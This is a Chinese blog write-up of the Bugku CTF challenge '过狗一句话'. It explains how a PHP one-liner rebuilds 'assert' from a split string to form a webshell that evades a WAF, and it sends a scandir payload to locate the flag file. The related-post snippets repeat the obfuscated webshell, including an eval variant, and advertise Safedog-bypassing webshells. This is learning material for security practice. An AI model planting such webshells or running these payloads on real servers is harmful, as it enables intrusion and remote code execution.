过狗一句话(bugku)

最新推荐文章于 2021-08-08 16:43:46 发布
最新推荐文章于 2021-08-08 16:43:46 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: Web学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/destiny1507/article/details/83211579
版权

       昨天写了个关于一句话木马的题,今天上午百度了一个上午理解一句话木马,感jio还是有点懵逼,于是想写一下题来理解一下下……不过虽然这道题题目叫过狗一句话,但似乎跟我想象的不大一样emmmmm

----------------------------------------------------------不废话不废话----------------------我是分割线分割线-----------------------------------------

题目中给了一小段php代码:

然后我经历了点开题目链接、查看源代码、扫描目录后也并没有发现其他的hint,于是……老老实实分析这段代码:

这里explode函数把字符串poc按#分隔开并映到poc_1数组中去;

然后poc_2再把他们连接起来,总的来说就是把poc中的#去掉,变成一个新的字符串赋值给poc_2;

可以看出,poc_2是assert,然后我们来看最后一句话,它现在变成了一个函数,即:

    assert($_GET['s'])

而assert函数功能跟eval类似,可以把里面的内容当作代码来执行,考虑扫描目录下的文件,构造payload:

?s=print_r(scandir('./'));可以把当前目录下的文件或者目录以数组的形式显示出来;

其中123.php、index.php、test.php都是用御剑扫描出来过并没有发现什么东西的,但是有一个十分可疑的f14g.txt,于是访问:得到flag:

_Warning_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2015年最新的过狗一句话大马
12-26
2015年最新的过狗一句话大马
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku过狗一句话
wssmiss的博客
04-16 342
题目 php代码 explode(a,b,c):把字符串打散为数组,a为分隔符且不为空,b为待打散的字符,c规定所返回的数组元素的数目 0代表返回博阿寒一个元素的数组,大于0返回包含最多c个元素的数组。小于0,返回包含除最后的limit个元素意外的所有元素的数组 代码poc_1是一个数组有a,s,s,e,r,t五个元素 poc_2是assert函数 对传入的s进行操作 注:函数assert是检...
bugku 过狗一句话
Superpig的博客
11-12 724
分析 根据提示,分析得关键在于assert(),查资料得assert()用于调试,跟eval()差不多,但是eval()只能执行符合php编码规范的$code_str 解题 构造payload http://123.206.87.240:8010/?s=print_r(scandir(’./’)); 得到目录结构 再访问http://123.206.87.240:8010/fl4g.txt 即...
过狗一句话 -Bugku
j7ur8
06-21 1116
搜索到的几种解法:    1. s=print_r(scandir('./')) 然后读取flag.txt    2. s=print_r(glob("*.*")) 然后读取show_source(flag.txt)    3. 使用flag_get_contents(flag.txt)读取文件    eg: 还有system('ls')的读取方法但是这里应该没有权限....
Bugku-CTF之过狗一句话(送给大家一个过狗一句话
weixin_34227447的博客
04-28 855
Day25 过狗一句话 http://123.206.87.240:8010/ 送给大家一个过狗一句话<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?...
BugKu杂项QAQ反编译完整版
07-21
"BugKu杂项QAQ反编译完整版"是指针对BugKu平台上的一个MISC(Miscellaneous)类问题,该问题涉及到一个名为"QAQ"的挑战,可能是一个编程或解谜类型的题目。由于在线反编译工具可能无法提供完整的结果,这里提供了一...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku杂项题writeup
11-22
bugku杂项题writeup
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
最新过安全狗一句话
10-14
最新过安全狗一句话
过狗asp大马
12-26
asp大马 过安全狗
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
过狗一句话
xyx107的博客
04-27 1053
题意大致为网站含有一句话漏洞,可以利用这个漏洞得到flag; 1.PHP explode(),此函数可以将字符串打散为数组 如:$str = "i love flag !"; print_r(explode(" ",$str)); 输出为:Array([0]=>i[1]=>love[2]=>flag[3]=>!); 按照“ ”引号内(即separ...
bugku 过狗一句话
weixin_30539835的博客
04-27 189
用php的系统函数,突破低权限。 题目来自于bugku的"过狗一句话",这道题目有接近2100人做出来,可是网上的wp并没有给出确切的原理,所以在此借这一道题目,抛砖引入。 题目地址 一丶代码和分析 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); //explode()把"a#s#s#e#r#t"去掉变为a...
Bugku-CTF-shell-过狗一句话
kaixinXQ的博客
08-08 404
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 点击题目: 读取PHP下面的文件: print_r(scandir($dir)),还可以利用print_r(glob("*.*")) 访问txt文件:http://114.67.246.176:16100/.
Bugku web 过狗一句话
Amire0x的小乐园
05-05 321
学到了以前不知道的新东西 题目链接 直接看代码 explode():使用一个字符串分割整个字符串,并返回由字符串组成的数组。 assert():把字符串按照php代码来执行。 这样一来$poc_2就是assert, 即现在的结果是assert($_GET['s']) 这下就可以估计flag应该是藏在某个文件里了 于是用到一个扫描目录的函数 scandir()列出指定路径中的文件和目录 glob()...
过狗一句话
qq_41814777的博客
10-20 984
php过狗一句话: waf通常以关键字来判断是否是一句话木马。 <?php $test="e#v#a#l"; $test1=explode("#",$test); $test2=$test1[0].$test1[1].$test1[2].$test1[3]; $test2($_POST['zt']); ?> 这是eval函数的一句话的写法 <?...
Bugku web22 过狗一句话
weixin_44522540的博客
02-23 180
十八、web22 过狗一句话 本题:php scandir()函数、assert代码执行漏洞 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); //explode("#",$poc);将$poc以#为分界符号分为数组 $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; // 这句就相当于$poc_2=assert $poc_2($
bugku 道友不来算一算凶吉?
最新发布
10-13
bugku中,道友不来可能意味着两种不同的凶吉解读。 首先,如果道友不来,我们可以将之视为凶兆。道友的存在意味着友情的支持和帮助,如果他没有到来,可能意味着我们将面临困难和挑战。这可能是一种警示,提醒...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值